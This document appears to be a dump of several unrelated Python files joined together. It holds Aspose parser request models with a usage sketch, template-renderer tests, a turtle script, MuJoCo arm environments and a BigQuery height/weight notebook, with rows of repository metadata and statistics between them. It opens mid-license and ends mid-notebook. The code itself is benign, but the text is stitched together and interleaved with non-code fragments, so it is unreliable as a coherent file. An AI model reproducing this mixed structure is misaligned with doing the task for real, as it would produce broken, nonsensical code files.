# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# --------------------------------------------------------------------------------
class ParseRequest(object):
"""
Request model for parse operation.
:param options Parse options.
"""
def __init__(self, options):
"""Initializes new instance of ParseRequest.""" # noqa: E501
self.options = options
# coding: utf-8
# --------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="text_request.py">
# Copyright (c) 2003-2019 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# --------------------------------------------------------------------------------
class TextRequest(object):
"""
Request model for text operation.
:param options Extract text options.
"""
def __init__(self, options):
"""Initializes new instance of TextRequest.""" # noqa: E501
self.options = options
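# --- Usage sketch (appended example, not part of the generated client) -------
# A minimal, hedged walk-through of the synchronous call path. TextOptions and
# FileInfo, along with the file_info/file_path attribute names, are assumed to
# be provided by the groupdocs_parser_cloud package; the credentials and the
# storage path are placeholders.
if __name__ == "__main__":
    from groupdocs_parser_cloud import TextOptions, FileInfo  # assumed exports

    api = ParseApi.from_keys("your-app-sid", "your-app-key")
    options = TextOptions()
    options.file_info = FileInfo()
    options.file_info.file_path = "words/docx/document.docx"
    result = api.text(TextRequest(options))
    print(result.text)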
| 39.306554 | 108 | 0.622902 | 2,168 | 18,592 | 5.193727 | 0.118542 | 0.028419 | 0.017318 | 0.02238 | 0.853464 | 0.839165 | 0.823446 | 0.823446 | 0.823446 | 0.786146 | 0 | 0.011936 | 0.260972 | 18,592 | 472 | 109 | 39.389831 | 0.807569 | 0.489727 | 0 | 0.70297 | 0 | 0 | 0.186081 | 0.030268 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069307 | false | 0 | 0.034653 | 0 | 0.188119 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d06bca0f5137d798e6ac9af958e75bdd57ae0c55 | 3,645 | py | Python | test/test_templates_collection.py | dmulyalin/template-text-renderer | f1993b6e8f652d55207b7d0961673dea8e7ffec1 | [
"MIT"
] | 5 | 2021-01-27T03:58:04.000Z | 2022-02-06T14:20:26.000Z | test/test_templates_collection.py | dmulyalin/template-text-renderer | f1993b6e8f652d55207b7d0961673dea8e7ffec1 | [
"MIT"
] | 1 | 2021-12-21T15:17:55.000Z | 2021-12-23T07:31:26.000Z | test/test_templates_collection.py | dmulyalin/template-text-renderer | f1993b6e8f652d55207b7d0961673dea8e7ffec1 | [
"MIT"
] | null | null | null | import sys
sys.path.insert(0,'../')
import pprint
from ttr import ttr
def test_loading_template_from_collection():
data = """
- interface: Gi1/1
description: Customer A
vid: 100
ip: 10.0.0.1
mask: 255.255.255.0
vrf: cust_a
template: ttr://simple/interface.cisco_ios.txt
device: rt-1
- interface: Gi1/2
description: Customer C
vid: 300
ip: 10.0.3.1
mask: 255.255.255.0
vrf: cust_c
template: ttr://simple/interface.cisco_ios.txt
device: rt-1
- interface: Gi1/2
description: Customer B
vid: 200
ip: 10.0.2.1
mask: 255.255.255.0
vrf: cust_b
template: ttr://simple/interface.cisco_ios.txt
device: rt-2
"""
generator = ttr(data=data, data_plugin="yaml")
generator.run()
# pprint.pprint(generator.results)
assert generator.results == {'rt-1': 'interface Gi1/1\n'
' description Customer A\n'
' encapsulation dot1q 100\n'
' vrf forwarding cust_a\n'
' ip address 10.0.0.1 255.255.255.0\n'
' exit\n'
'!\n'
'interface Gi1/2\n'
' description Customer C\n'
' encapsulation dot1q 300\n'
' vrf forwarding cust_c\n'
' ip address 10.0.3.1 255.255.255.0\n'
' exit\n'
'!',
'rt-2': 'interface Gi1/2\n'
' description Customer B\n'
' encapsulation dot1q 200\n'
' vrf forwarding cust_b\n'
' ip address 10.0.2.1 255.255.255.0\n'
' exit\n'
'!'}
# test_loading_template_from_collection()
def test_loading_template_from_collection_no_txt_extension():
data = """
- interface: Gi1/1
description: Customer A
vid: 100
ip: 10.0.0.1
mask: 255.255.255.0
vrf: cust_a
template: ttr://simple/interface.cisco_ios
device: rt-1
- interface: Gi1/2
description: Customer B
vid: 200
ip: 10.0.2.1
mask: 255.255.255.0
vrf: cust_b
template: ttr://simple/interface.cisco_ios
device: rt-2
"""
generator = ttr(data=data, data_plugin="yaml")
generator.run()
# pprint.pprint(generator.results)
assert generator.results == {'rt-1': 'interface Gi1/1\n'
' description Customer A\n'
' encapsulation dot1q 100\n'
' vrf forwarding cust_a\n'
' ip address 10.0.0.1 255.255.255.0\n'
' exit\n'
'!',
'rt-2': 'interface Gi1/2\n'
' description Customer B\n'
' encapsulation dot1q 200\n'
' vrf forwarding cust_b\n'
' ip address 10.0.2.1 255.255.255.0\n'
' exit\n'
'!'}
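# A smoke-test sketch in the same pattern as the tests above; it reuses only
# the API already exercised here (ttr(...), .run(), .results) and asserts only
# that the device key is rendered, since the exact text depends on the
# packaged template.
def test_loading_template_from_collection_smoke():
    data = """
    - interface: Gi1/3
      description: Customer D
      vid: 400
      ip: 10.0.4.1
      mask: 255.255.255.0
      vrf: cust_d
      template: ttr://simple/interface.cisco_ios.txt
      device: rt-3
    """
    generator = ttr(data=data, data_plugin="yaml")
    generator.run()
    assert "rt-3" in generator.results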
# test_loading_template_from_collection_no_txt_extension() | 36.818182 | 79 | 0.428807 | 386 | 3,645 | 3.948187 | 0.139896 | 0.07874 | 0.059055 | 0.065617 | 0.928478 | 0.919948 | 0.872703 | 0.872703 | 0.818241 | 0.816273 | 0 | 0.112389 | 0.475171 | 3,645 | 99 | 80 | 36.818182 | 0.684266 | 0.044444 | 0 | 0.820225 | 0 | 0 | 0.451567 | 0.049439 | 0 | 0 | 0 | 0 | 0.022472 | 1 | 0.022472 | false | 0 | 0.033708 | 0 | 0.05618 | 0.011236 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d0700c4be68e5a457567c8c5e4bb29e5727be8db | 215 | py | Python | example/test/L4_homework_answer_ide.py | Michael8968/skulpt | 15956a60398fac92ee1dab25bf661ffc003b2eaf | [
"MIT"
] | 2 | 2021-12-18T06:34:26.000Z | 2022-01-05T05:08:47.000Z | example/test/L4_homework_answer_ide.py | Michael8968/skulpt | 15956a60398fac92ee1dab25bf661ffc003b2eaf | [
"MIT"
] | null | null | null | example/test/L4_homework_answer_ide.py | Michael8968/skulpt | 15956a60398fac92ee1dab25bf661ffc003b2eaf | [
"MIT"
] | null | null | null | import turtle
a=int(input("输入你的幸运数: "))
turtle.forward(a/3)
turtle.right(90)
turtle.forward(a/3)
turtle.right(90)
turtle.forward(a/3)
turtle.right(90)
turtle.forward(a/3)
turtle.right(90)
print(a)
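# Equivalent sketch using a loop: the four forward/right pairs above collapse
# into one repetition (left as a comment so the drawing is not duplicated):
# for _ in range(4):
#     turtle.forward(a / 3)
#     turtle.right(90)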
turtle.done() | 12.647059 | 25 | 0.725581 | 38 | 215 | 4.105263 | 0.315789 | 0.333333 | 0.358974 | 0.384615 | 0.717949 | 0.717949 | 0.717949 | 0.717949 | 0.717949 | 0.717949 | 0 | 0.060914 | 0.083721 | 215 | 17 | 26 | 12.647059 | 0.730964 | 0 | 0 | 0.666667 | 0 | 0 | 0.041667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.083333 | 0.083333 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d08f053f03039c57e8454fe680155ce4c4757d00 | 14,296 | py | Python | softlearning/environments/gym/mujoco/vertical_arm.py | JiazhengChai/synergy_DRL | c08e78e5fe39d9d46213e1bf07b8dafc2195b05a | [
"MIT"
] | 2 | 2020-01-07T04:12:42.000Z | 2021-12-21T22:25:31.000Z | softlearning/environments/gym/mujoco/vertical_arm.py | JiazhengChai/synergy_DRL | c08e78e5fe39d9d46213e1bf07b8dafc2195b05a | [
"MIT"
] | 11 | 2019-11-29T02:59:34.000Z | 2022-03-12T00:07:28.000Z | softlearning/environments/gym/mujoco/vertical_arm.py | JiazhengChai/synergy_DRL | c08e78e5fe39d9d46213e1bf07b8dafc2195b05a | [
"MIT"
] | 1 | 2020-04-28T12:06:40.000Z | 2020-04-28T12:06:40.000Z | import numpy as np
from gym import utils
from gym.envs.mujoco import mujoco_env
import os
from . import path
DEFAULT_CAMERA_CONFIG = {
'trackbodyid': 0,
'distance': 1.0,
'lookat': np.array((0.0, 0.0, 0)),
'elevation': 0,
}
def sin(t, omega=1.5, phi=0.):
    """Sinusoid driving the moving target (angular frequency omega, phase phi)."""
    return np.sin(omega * t + phi)

def cos(t, omega=1.5, phi=0.):
    """Cosine counterpart of sin(); same parameterization."""
    return np.cos(omega * t + phi)
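# The environments below move their target along p(t) = r*sin(omega*t), tilted
# by -25 degrees and offset slightly upward; a minimal sketch of that
# parameterization, using the r and tilt values hard-coded in step():
#   r, tilt = 0.15, -25 * np.pi / 180.
#   dx = -r * sin(t) * np.sin(tilt)
#   dz = r * sin(t) * np.cos(tilt) + 0.01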
class VA(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,xml_file='vertical_arm.xml',
distance_reward_weight=5.0,
ctrl_cost_weight=0.05
):
utils.EzPickle.__init__(**locals())
self.joint_list = ['shoulder', 'elbow']
self.real_time=0.01
self.frame_skip=2
self.t=0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight= distance_reward_weight
self.ctrl_cost_weight= ctrl_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
    def step(self, a):
        # Joint angles before the simulation step, kept for the energy estimate.
        states_angle = []
        for j in self.joint_list:
            states_angle.append(self.sim.data.get_joint_qpos(j))

        # Reward: weighted negative fingertip-to-target distance plus a
        # squared-action control penalty.
        vec = self.get_body_com("fingertip") - self.target_pos
        reward_dist = -np.linalg.norm(vec)
        reward_ctrl = -np.square(a).sum()
        reward = self.distance_reward_weight * reward_dist + self.ctrl_cost_weight * reward_ctrl

        self.do_simulation(a, self.frame_skip)
        self.t += self.frame_skip * self.real_time

        # Move the target along a sinusoidal trajectory tilted by -25 degrees,
        # with a small constant vertical offset.
        self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [
            -0.15 * sin(self.t, phi=0) * np.sin(-25 * np.pi / 180.), 0,
            0.15 * sin(self.t, phi=0) * np.cos(-25 * np.pi / 180.) + 0.01]
        self.target_pos = self.sim.data.site_xpos[0]

        ob = self._get_obs()

        # Approximate mechanical energy: sum over joints of |action| * |delta angle|.
        next_states_angle = []
        for j in self.joint_list:
            next_states_angle.append(self.sim.data.get_joint_qpos(j))
        energy = 0
        for i in range(len(self.joint_list)):
            delta_theta = np.abs(next_states_angle[i] - states_angle[i])
            energy = energy + np.abs(a[i]) * delta_theta

        done = False
        info = {
            'energy': energy,
            'reward_dist': self.distance_reward_weight * reward_dist,
            'reward_ctrl': self.ctrl_cost_weight * reward_ctrl,
            'ori_reward': reward
        }
        return ob, reward, done, info
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
def reset_model(self):
self.t=0
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
    def _get_obs(self):
        # Observation: cos/sin of both joint angles, any remaining generalized
        # positions, the two joint velocities, and the fingertip-to-target
        # offsets along x and z.
        theta = self.sim.data.qpos.flat[:2]
        return np.concatenate([
            np.cos(theta),
            np.sin(theta),
            self.sim.data.qpos.flat[2:],
            self.sim.data.qvel.flat[:2],
            [self.get_body_com("fingertip")[0] - self.target_pos[0]],
            [self.get_body_com("fingertip")[2] - self.target_pos[2]]
        ]).ravel()
class VA4dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,xml_file='vertical_arm4dof.xml',
distance_reward_weight=5.0,
ctrl_cost_weight=0.05
):
utils.EzPickle.__init__(**locals())
self.joint_list = ['shoulder','shoulder2', 'elbow', 'elbow2']
self.real_time=0.01
self.frame_skip=2
self.t=0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight= distance_reward_weight
self.ctrl_cost_weight= ctrl_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
    def step(self, a):
        # Joint angles before the simulation step, kept for the energy estimate.
        states_angle = []
        for j in self.joint_list:
            states_angle.append(self.sim.data.get_joint_qpos(j))

        # Reward: weighted negative fingertip-to-target distance plus a
        # squared-action control penalty.
        vec = self.get_body_com("fingertip") - self.target_pos
        reward_dist = -np.linalg.norm(vec)
        reward_ctrl = -np.square(a).sum()
        reward = self.distance_reward_weight * reward_dist + self.ctrl_cost_weight * reward_ctrl

        self.do_simulation(a, self.frame_skip)
        self.t += self.frame_skip * self.real_time

        # Move the target along a sinusoidal trajectory tilted by -25 degrees,
        # with a small constant vertical offset.
        self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [
            -0.15 * sin(self.t, phi=0) * np.sin(-25 * np.pi / 180.), 0,
            0.15 * sin(self.t, phi=0) * np.cos(-25 * np.pi / 180.) + 0.01]
        self.target_pos = self.sim.data.site_xpos[0]

        ob = self._get_obs()

        # Approximate mechanical energy: sum over joints of |action| * |delta angle|.
        next_states_angle = []
        for j in self.joint_list:
            next_states_angle.append(self.sim.data.get_joint_qpos(j))
        energy = 0
        for i in range(len(self.joint_list)):
            delta_theta = np.abs(next_states_angle[i] - states_angle[i])
            energy = energy + np.abs(a[i]) * delta_theta

        done = False
        info = {
            'energy': energy,
            'reward_dist': self.distance_reward_weight * reward_dist,
            'reward_ctrl': self.ctrl_cost_weight * reward_ctrl,
            'ori_reward': reward
        }
        return ob, reward, done, info
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
def reset_model(self):
self.t=0
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:4]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[4:],
self.sim.data.qvel.flat[:4],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
]).ravel()
class VA6dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,xml_file='vertical_arm6dof.xml',
distance_reward_weight=5.0,
ctrl_cost_weight=0.05
):
utils.EzPickle.__init__(**locals())
self.joint_list = ['shoulder','shoulder2', 'elbow', 'elbow2','elbow3', 'elbow4']
self.real_time=0.01
self.frame_skip=2
self.t=0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight= distance_reward_weight
self.ctrl_cost_weight= ctrl_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
    def step(self, a):
        # Joint angles before the simulation step, kept for the energy estimate.
        states_angle = []
        for j in self.joint_list:
            states_angle.append(self.sim.data.get_joint_qpos(j))

        # Reward: weighted negative fingertip-to-target distance plus a
        # squared-action control penalty.
        vec = self.get_body_com("fingertip") - self.target_pos
        reward_dist = -np.linalg.norm(vec)
        reward_ctrl = -np.square(a).sum()
        reward = self.distance_reward_weight * reward_dist + self.ctrl_cost_weight * reward_ctrl

        self.do_simulation(a, self.frame_skip)
        self.t += self.frame_skip * self.real_time

        # Move the target along a sinusoidal trajectory tilted by -25 degrees,
        # with a small constant vertical offset.
        self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [
            -0.15 * sin(self.t, phi=0) * np.sin(-25 * np.pi / 180.), 0,
            0.15 * sin(self.t, phi=0) * np.cos(-25 * np.pi / 180.) + 0.01]
        self.target_pos = self.sim.data.site_xpos[0]

        ob = self._get_obs()

        # Approximate mechanical energy: sum over joints of |action| * |delta angle|.
        next_states_angle = []
        for j in self.joint_list:
            next_states_angle.append(self.sim.data.get_joint_qpos(j))
        energy = 0
        for i in range(len(self.joint_list)):
            delta_theta = np.abs(next_states_angle[i] - states_angle[i])
            energy = energy + np.abs(a[i]) * delta_theta

        done = False
        info = {
            'energy': energy,
            'reward_dist': self.distance_reward_weight * reward_dist,
            'reward_ctrl': self.ctrl_cost_weight * reward_ctrl,
            'ori_reward': reward
        }
        return ob, reward, done, info
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
def reset_model(self):
self.t=0
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:6]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[6:],
self.sim.data.qvel.flat[:6],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
]).ravel()
class VA8dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,xml_file='vertical_arm8dof.xml',
distance_reward_weight=5.0,
ctrl_cost_weight=0.05
):
utils.EzPickle.__init__(**locals())
self.joint_list = ['shoulder','shoulder2', 'shoulder3','shoulder4','elbow', 'elbow2','elbow3', 'elbow4']
self.real_time=0.01
self.frame_skip=2
self.t=0
self.target_pos = np.asarray([0, 0, 0])
self.distance_reward_weight= distance_reward_weight
self.ctrl_cost_weight= ctrl_cost_weight
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), self.frame_skip)
    def step(self, a):
        # Joint angles before the simulation step, kept for the energy estimate.
        states_angle = []
        for j in self.joint_list:
            states_angle.append(self.sim.data.get_joint_qpos(j))

        # Reward: weighted negative fingertip-to-target distance plus a
        # squared-action control penalty.
        vec = self.get_body_com("fingertip") - self.target_pos
        reward_dist = -np.linalg.norm(vec)
        reward_ctrl = -np.square(a).sum()
        reward = self.distance_reward_weight * reward_dist + self.ctrl_cost_weight * reward_ctrl

        self.do_simulation(a, self.frame_skip)
        self.t += self.frame_skip * self.real_time

        # Move the target along a sinusoidal trajectory tilted by -25 degrees,
        # with a small constant vertical offset.
        self.sim.data.site_xpos[0] = self.sim.data.site_xpos[0] + [
            -0.15 * sin(self.t, phi=0) * np.sin(-25 * np.pi / 180.), 0,
            0.15 * sin(self.t, phi=0) * np.cos(-25 * np.pi / 180.) + 0.01]
        self.target_pos = self.sim.data.site_xpos[0]

        ob = self._get_obs()

        # Approximate mechanical energy: sum over joints of |action| * |delta angle|.
        next_states_angle = []
        for j in self.joint_list:
            next_states_angle.append(self.sim.data.get_joint_qpos(j))
        energy = 0
        for i in range(len(self.joint_list)):
            delta_theta = np.abs(next_states_angle[i] - states_angle[i])
            energy = energy + np.abs(a[i]) * delta_theta

        done = False
        info = {
            'energy': energy,
            'reward_dist': self.distance_reward_weight * reward_dist,
            'reward_ctrl': self.ctrl_cost_weight * reward_ctrl,
            'ori_reward': reward
        }
        return ob, reward, done, info
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
def reset_model(self):
self.t=0
qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos
qvel = self.init_qvel + self.np_random.uniform(low=-.005, high=.005, size=self.model.nv)
self.set_state(qpos, qvel)
self.target_pos = self.data.site_xpos[0]
return self._get_obs()
def _get_obs(self):
theta = self.sim.data.qpos.flat[:8]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.sim.data.qpos.flat[8:],
self.sim.data.qvel.flat[:8],
[self.get_body_com("fingertip")[0] - self.target_pos[0]],
[self.get_body_com("fingertip")[2] - self.target_pos[2]]
]).ravel()
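# --- Usage sketch (appended example, not part of the original file) ----------
# A hedged smoke run of the 2-DoF arm. It assumes mujoco-py is installed and
# that vertical_arm.xml is resolvable via the package-level `path` import.
if __name__ == "__main__":
    env = VA()
    env.reset()
    for _ in range(10):
        action = env.action_space.sample()
        ob, reward, done, info = env.step(action)
        print(round(reward, 3), round(float(info['energy']), 5))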
| 35.650873 | 128 | 0.588137 | 2,008 | 14,296 | 3.938745 | 0.075199 | 0.028322 | 0.044506 | 0.032874 | 0.966115 | 0.956505 | 0.956505 | 0.955494 | 0.955494 | 0.950183 | 0 | 0.030095 | 0.27714 | 14,296 | 400 | 129 | 35.74 | 0.735243 | 0.032317 | 0 | 0.848057 | 0 | 0 | 0.039238 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.077739 | false | 0 | 0.017668 | 0.007067 | 0.159011 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d0c3a0dddb5cd8e9776c7bb70f09287f9966f75b | 9,939 | py | Python | data_steward/analytics/cdr_ops/ad_hoc_analyses/height_weight_analyses.py | lrwb-aou/curation | e80447e56d269dc2c9c8bc79e78218d4b0dc504c | [
"MIT"
] | 16 | 2017-06-30T20:05:05.000Z | 2022-03-08T21:03:19.000Z | data_steward/analytics/cdr_ops/ad_hoc_analyses/height_weight_analyses.py | lrwb-aou/curation | e80447e56d269dc2c9c8bc79e78218d4b0dc504c | [
"MIT"
] | 342 | 2017-06-23T21:37:40.000Z | 2022-03-30T16:44:16.000Z | data_steward/analytics/cdr_ops/ad_hoc_analyses/height_weight_analyses.py | lrwb-aou/curation | e80447e56d269dc2c9c8bc79e78218d4b0dc504c | [
"MIT"
] | 33 | 2017-07-01T00:12:20.000Z | 2022-01-26T18:06:53.000Z | # ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.4.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## This notebook is intended to gather information about the different sites for selected height and weight concept_IDs. This may allow us to better identify cleaning rules that could be implemented or sites with which we must correspond
from google.cloud import bigquery
client = bigquery.Client()
# %load_ext google.cloud.bigquery
# %matplotlib inline
import pandas as pd
from notebooks import parameters
DATASET = parameters.LATEST_DATASET
# +
import os
cwd = os.getcwd()
cwd = str(cwd)
print("Current working directory is: {cwd}".format(cwd=cwd))
# +
to_print = f"Dataset to use: {DATASET}"
print(to_print)
# -
# ## First - let's see what unit_concept_ids sites are using for each of the concept_ids
height_unit_distribution_query = f"""
SELECT
DISTINCT
m.measurement_concept_id, c.concept_name as measurement_concept,
m.unit_concept_id, c2.concept_name as unit_concept, c2.standard_concept as unit_standard_concept,
COUNT(*) as count
FROM
`{DATASET}.unioned_ehr_measurement` m
JOIN
`{DATASET}.concept` c
ON
m.measurement_concept_id = c.concept_id
JOIN
`{DATASET}.concept` c2
ON
m.unit_concept_id = c2.concept_id
WHERE
m.measurement_concept_id IN (3036277, 3023540, 3019171)
GROUP BY 1, 2, 3, 4, 5
ORDER BY count DESC
"""
height_unit_distribution = pd.io.gbq.read_gbq(height_unit_distribution_query, dialect='standard')
height_unit_distribution
weight_unit_distribution_query = f"""
SELECT
DISTINCT
m.measurement_concept_id, c.concept_name as measurement_concept,
m.unit_concept_id, c2.concept_name as unit_concept, c2.standard_concept as unit_standard_concept,
COUNT(*) as count
FROM
`{DATASET}.unioned_ehr_measurement` m
JOIN
`{DATASET}.concept` c
ON
m.measurement_concept_id = c.concept_id
JOIN
`{DATASET}.concept` c2
ON
m.unit_concept_id = c2.concept_id
WHERE
m.measurement_concept_id IN (3025315, 3013762, 3023166)
GROUP BY 1, 2, 3, 4, 5
ORDER BY count DESC
"""
weight_unit_distribution = pd.io.gbq.read_gbq(weight_unit_distribution_query, dialect='standard')
weight_unit_distribution
# ### Want to see if any site uses > 1 unit_concept_id for the same measurement_concept_id
units_used_per_site_query = f"""
SELECT
DISTINCT
mm.src_hpo_id,
m.measurement_concept_id, c.concept_name as measurement_concept,
COUNT(DISTINCT m.unit_concept_id) as num_units_used
FROM
`{DATASET}.unioned_ehr_measurement` m
JOIN
`{DATASET}._mapping_measurement` mm
ON
m.measurement_id = mm.measurement_id
JOIN
`{DATASET}.concept` c
ON
m.measurement_concept_id = c.concept_id
WHERE
m.measurement_concept_id IN (3025315, 3013762, 3023166, 3036277, 3023540, 3019171)
GROUP BY 1, 2, 3
ORDER BY num_units_used DESC
"""
units_used_per_site = pd.io.gbq.read_gbq(units_used_per_site_query, dialect='standard')
units_used_per_site
# ## Now ascertaining the data for each site; the number of unit_concept_ids used is included as well, to show potential reasons for a large range
height_distribution_by_site_query = f"""
SELECT
DISTINCT
mm.src_hpo_id,
m.measurement_concept_id, c.concept_name as measurement_concept,
ROUND(MIN(m.value_as_number) OVER (PARTITION BY mm.src_hpo_id), 2) as min,
ROUND(MAX(m.value_as_number) OVER (PARTITION BY mm.src_hpo_id), 2) as max,
ROUND(AVG(m.value_as_number) OVER (PARTITION BY mm.src_hpo_id), 2) as mean,
ROUND(STDDEV_POP(m.value_as_number) OVER (PARTITION BY mm.src_hpo_id), 2) as stdev,
COUNT(m.measurement_id) OVER (PARTITION BY mm.src_hpo_id) as num_rows
FROM
`{DATASET}.unioned_ehr_measurement` m
JOIN
`{DATASET}._mapping_measurement` mm
ON
m.measurement_id = mm.measurement_id
JOIN
`{DATASET}.concept` c
ON
m.measurement_concept_id = c.concept_id
WHERE
m.measurement_concept_id IN (3036277, 3023540, 3019171)
GROUP BY mm.src_hpo_id, m.measurement_concept_id, c.concept_name, m.value_as_number, m.measurement_id
ORDER BY measurement_concept_id DESC, mean DESC
"""
height_distribution_by_site = pd.io.gbq.read_gbq(height_distribution_by_site_query, dialect='standard')
# +
temp_df = units_used_per_site[['src_hpo_id', 'measurement_concept_id', 'num_units_used']]
matching_cols = ['src_hpo_id', 'measurement_concept_id']
height_distribution_by_site = height_distribution_by_site.merge(temp_df, on=matching_cols)
# -
height_distribution_by_site
height_distribution_by_site.to_csv(f"{cwd}/height_analysis_by_site.csv")
weight_distribution_by_site_query = f"""
SELECT
DISTINCT
mm.src_hpo_id,
m.measurement_concept_id, c.concept_name as measurement_concept,
ROUND(MIN(m.value_as_number) OVER (PARTITION BY mm.src_hpo_id), 2) as min,
ROUND(MAX(m.value_as_number) OVER (PARTITION BY mm.src_hpo_id), 2) as max,
ROUND(AVG(m.value_as_number) OVER (PARTITION BY mm.src_hpo_id), 2) as mean,
ROUND(STDDEV_POP(m.value_as_number) OVER (PARTITION BY mm.src_hpo_id), 2) as stdev,
COUNT(m.measurement_id) OVER (PARTITION BY mm.src_hpo_id) as num_rows
FROM
`{DATASET}.unioned_ehr_measurement` m
JOIN
`{DATASET}._mapping_measurement` mm
ON
m.measurement_id = mm.measurement_id
JOIN
`{DATASET}.concept` c
ON
m.measurement_concept_id = c.concept_id
WHERE
m.measurement_concept_id IN (3025315, 3013762, 3023166)
GROUP BY mm.src_hpo_id, m.measurement_concept_id, c.concept_name, m.value_as_number, m.measurement_id
ORDER BY measurement_concept_id DESC, mean DESC
"""
weight_distribution_by_site = pd.io.gbq.read_gbq(weight_distribution_by_site_query, dialect='standard')
# +
temp_df = units_used_per_site[['src_hpo_id', 'measurement_concept_id', 'num_units_used']]
matching_cols = ['src_hpo_id', 'measurement_concept_id']
